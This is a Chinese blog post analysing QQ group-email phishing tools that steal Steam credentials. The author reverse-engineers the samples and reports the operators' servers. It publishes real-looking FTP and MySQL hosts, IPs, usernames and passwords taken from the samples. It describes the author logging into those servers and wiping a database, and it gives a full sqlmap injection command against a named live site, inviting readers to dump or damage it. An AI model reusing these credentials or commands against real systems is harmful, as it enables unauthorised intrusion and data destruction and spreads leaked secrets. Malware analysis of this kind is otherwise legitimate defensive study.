前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >群邮件钓鱼软件的简单分析并拿到后台

群邮件钓鱼软件的简单分析并拿到后台

作者头像
xuing
发布2019-10-19 10:09:33
1.8K0
发布2019-10-19 10:09:33
举报
文章被收录于专栏:中二病也要当白帽子

截图

不知道从何时起,qq群邮件就成为了钓鱼软件传播的一个绝佳场所,什么“”萌妹变声器”,“破解UU加速器”。 我偶尔闲的无聊的时候,就会下载下来耗费几分钟逆(ti)向(chuan)一下.发现钓鱼软件总是要把自己服务器的账号密码写到软件里面。 现在我们来一起捋一捋这个事情。

首先,这些钓鱼软件会通过控件覆盖的方式盗取Steam账号密码,并且为了过Steam的安全验证需要将ssfn开头的授权文件上传到病毒作者服务器。

这个文件

控件覆盖

可以看到,这里的两个输入框和登录按钮都不是Steam自身的。并且是浮在空着的。

然后通过腾讯快速的“漏洞”,即通过本地的“localhost.ptlogin2.qq.com”,拿到cookies和token相关的登录信息,借此群发邮件。这块有很多人都聊过了,也很简单。网上资料也很多,我就不在赘述了。 下图,画圈的部分,就是批量发送群邮件相关的字符串。

字符串提取

其中,http://www.laohe788.com/zhuti.txt为邮件标题。 http://www.laohe788.com/zhengwen.txt为邮件内容

这么多钓鱼软件,我简单分析了一下,稍微见证了下作者的成长。 1月9号左右,作者传输盗号信息是通过直接使用远程访问mysql。执行sql语句来实现的。其中mysql的账号密码,并没有明文存储,直接IDA提串是看不到的,但是用火绒剑或Wireshark抓包就看到了。

火绒剑截图

不过根据Mysql的协议,密码不是直接明文传输的。 所以还是用OD调了一下,拿到了账号密码如下:

OD调用栈

服务器地址 host1.webhostidc.net 当时指向的ip为:103.234.97.196

账号以及数据库名均为:a1214170409。 密码为:7a7ef802

当时的部分截图如下:

截图

我帮他把数据库了清空一下,就没管了。

接下来,1月16号开始,作者就更换为PHP收信了。我以为他学聪明了...不会把自己的账号密码再放到程序里了,结果他为了传输Steam的ssfn授权文件,把自己的ftp账号密码写在了程序里面...

image.png

这时他的信息如下: 服务器地址:host1.webhostidc.net 收信网址:www.sk404.com/muma/jianpanjilu.php 账号:yy4961627321 密码:C7A1E537B84be3 这个时候没截图。现在已经变了。

然后直接看近期的吧,2月17号的(这个已经连不上了) ftp服务器地址:host1.webhostidc.net 收信网址:http://www.laopohehe.top/muma/jianpanjilu.php 密码:U2z3H7X6 账号:laopoheheda 还有很多,不一一列举了,反正就是一个作者,并且死脑筋...偶尔加个Super-EC,或者加个壳。反正就是要把账号密码写到程序里。mdzz。

我们看最新的(2月27号)。 FTP服务器:host1.webhostidc.net 账号:laopoheheda 密码:D3271E5EFD05d6 FTP登录进去,发现这zz的ftp服务器、mysql服务器和http服务器都是一台,ftp就可以看到http服务器的所有php文件了,查看config.php,可以看到mysql的账号密码

config.php

最新的另一个。 服务器:103.214.169.225 账号:laopohehe 密码:U2z3H7X6 这个的数据库账号密码是相同的。

话说看这些命名。可以确定是一伙人在作案。希望这些信息的曝光,可以增加他们的一些犯罪成本。

没有技术含量...基本IDA或者火绒剑提个串就看到了...

钓鱼软件内无账号密码的

再来一个稍微有点技术含量的。

www.lanzouyundown.com里面下载的“Apex英雄Origin解除限速”为例。 提取字符串,没有发现账号密码相关的字符串,因为内部使用了Super-EC模块,怀疑是中途解密的,使用Ollydbg进行调试并辅以Wireshark进行抓包。 【wireshark图】

抓包图

可以看到,这个http请求中,shuju1代表snfn名称。(然后name和pass,我初步猜测是用于区分是手下哪个小弟盗的,因为可以通过这个直接在网页中获取数据)shuju4是什么呢?既然没有看到有ftp相关的流量,调试中也没有发现。会不会这就是ssfn文件的16进制表示呢。 使用010editor打开本地的snfn文件,

010editor

可以发现和流量包中shuju4字段的内容是一致的。

作者终于不使用ftp来传输文件了

那就需要别的思路了。 把主站(www.sk408.com)拿AWVS和御剑什么的简单扫了一下,发现是DedeCMS的系统,版本是V57_SP2。找了一下相关漏洞,但是member功能关闭了,没有利用成功。后台简单扫了一下没扫出来,爆破后台的漏洞似乎也修复了。

作者用于记录数据的php文件为 www.sk408.com/muma/jianpanjilu.php 然后,根据之前我们ftp中得到的php文件,我们可以做一下简单的代码审计。

jianpanjilu.php源代码

sql语句是拼装的,也没做任何的检查或过滤。

直接上sqlmap,一把梭。

代码语言:javascript
复制
sqlmap -u "http://www.sk408.com/muma/jianpanjilu.php" --data "name=123&pass=123&username=qwe&password=qwe&ip=2.2.2.2&shuju1=123&shuju2=qwe&shuju3=qwe" --tamper=space2comment --random-agent --level 3 --dbs

数据库信息

代码语言:javascript
复制
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

数据库账号是shikong@%,但是不是DBA权限。所以没办法读取密码。 不过数据库是可以dump下来的,也可以搞些破坏,我对这个没兴趣..大家可以自己玩。

如果找到了其他漏洞,欢迎交流。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019.02.27 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 钓鱼软件内无账号密码的
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档